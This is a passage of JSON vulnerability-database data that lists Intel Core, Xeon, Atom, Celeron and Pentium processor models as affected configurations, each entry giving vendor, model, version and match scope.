"vendor": "intel", "version": null }, { "model": "xeon e5 2620 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4702mq" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4627_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2820qm" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4807" }, { "model": "xeon e5 2407 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4712mq" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2380p" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2115c" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2520m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "680um" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "640m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2715qe" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3227u" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2820" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "430um" }, { "model": "xeon e5 2430l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4860_v2" }, { "model": "xeon e5 1620 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2910" }, { "model": "pentium j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j2900" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1585_v5" }, { "model": "xeon e3 1105c v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1265l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8550u" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "530" }, { "model": "xeon e5 2428l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4809_v2" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4160t" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2308" }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j3060" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6157u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2430m" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8160" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8890_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2500" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "330m" }, { "model": "xeon e3 12201 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x3470" }, { "model": "xeon e3 1230", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2680" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6138t" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5118" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "540um" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "930" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4550u" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8350k" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2850_v2" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3235rk" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2390t" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8170" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "350m" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2538" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5520" }, { "model": "xeon e5 2418l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8176f" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7700t" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "390m" }, { "model": "xeon e3 1290 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "330um" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2940" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2649m" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n4200" }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4110" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2697_v2" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5504" }, { "model": "xeon e3 1245 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5508" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8870_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3820qm" }, { "model": "xeon e3 1280 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1281 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2100" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2560" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8156" }, { "model": "xeon e3 1268l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j3455" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2960xm" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4850_v4" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4020y" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7820eq" }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y51" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5520" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5300u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2687w" }, { "model": "xeon e5 1660", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 1680 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5506" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5649" }, { "model": "xeon e3 1275 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4150t" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6130" }, { "model": "xeon e5 2420", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4820_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4790" }, { "model": "xeon e3 1230 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "660" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6402p" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4860" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4603_v2" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8830" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3330" }, { "model": "xeon e5 1428l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3470s" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2720qm" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "ec5539" }, { "model": "xeon e5 1660 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4800mq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3540m" }, { "model": "xeon e3 1505m v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j1800" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4603" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5675r" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4650" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2350" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2758" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3338" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3225" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2860" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4860hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5775c" }, { "model": "pentium j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j3710" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3520" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3439y" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3570k" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7y75" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4278u" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2820" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3537u" }, { "model": "core m5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6y57" }, { "model": "xeon e3 1271 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1286 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4820_v4" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8700" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4648_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5675c" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "480m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "740qm" }, { "model": "core m3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7y32" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4950hq" }, { "model": "xeon e3 1286l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2657m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8400" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7290" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3530" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "610e" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5700eq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2620m" }, { "model": "xeon bronze 3104", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1230 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1280 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5119t" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6148f" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3150" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3110m" }, { "model": "xeon e3 1270 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "620le" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "950" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2658a_v3" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2328m" }, { "model": "xeon e5 2630", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1225 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4620_v4" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "560" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "661" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "380um" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "650" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5120" }, { "model": "xeon e3 1240l v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4130t" }, { "model": "xeon e5 2630 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3120m" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3000" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3520m" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5675" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4640_v3" }, { "model": "xeon e5 1428l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2608l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5775r" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4640" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3308" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2697_v3" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5640" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4150" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7820hk" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1565l_v5" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8857_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6440hq" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2670_v2" }, { "model": "xeon e5 2620 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2400" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l3426" }, { "model": "xeon e3 12201", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4308u" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8168" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3758" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4330" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "760" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2650l_v4" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4830_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4578u" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8870_v4" }, { "model": "xeon e3 1505l v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "965" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "940" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4100e" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2540m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4210u" }, { "model": "xeon e5 2418l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5120t" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4870_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4702ec" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2807" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2730" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3630qm" }, { "model": "xeon e5 2640 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770t" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3958" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4765t" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3508" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8890_v2" }, { "model": "xeon e5 2608l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "550" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3220t" }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4109t" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3010" }, { "model": "xeon e3 1285l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4820_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4690k" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2105" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4510u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2660_v4" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770k" }, { "model": "xeon e3 1268l v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2815" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2808" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3217ue" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3250t" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8100" }, { "model": "xeon e5 1650 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom e", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e3845" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4660_v4" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6167u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2515e" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5157u" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6138" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4610y" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3337u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "580m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "750" }, { "model": "xeon e5 1428l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3240t" }, { "model": "xeon e5 2650l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4910mq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3740qm" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4870hq" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3785" }, { "model": "xeon e5 2630 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4025u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4430s" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2635qm" }, { "model": "xeon e3 1285 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2630l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3229y" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4102e" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5667" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2690_v3" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4820" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3770t" }, { "model": "xeon e5 2628l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8867_v4" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4850" }, { "model": "xeon e3 1258l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4302y" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "330e" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3339y" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4710hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8700k" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5645" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8650u" }, { "model": "xeon e3 1220 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4116t" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3240" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2557m" }, { "model": "core m7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6y75" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "380m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2450m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "620lm" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5506" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8867_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6267u" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e7540" }, { "model": "xeon e3 1260l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3840qm" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5250u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2695_v2" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2357m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4670k" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2760" }, { "model": "xeon e3 1225 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2930" }, { "model": "atom e", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e3825" }, { "model": "xeon e3 1245 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2609 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2643", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2695_v4" }, { "model": "xeon e5 2448l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom e", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e3805" }, { "model": "xeon e5 2609 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3580" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6287u" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8860_v3" }, { "model": "xeon e5 1660 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e6540" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1535m_v6" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5020u" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3955" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "870" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "970" }, { "model": "xeon e5 2403 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2643 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4330te" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6500te" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4110e" }, { "model": 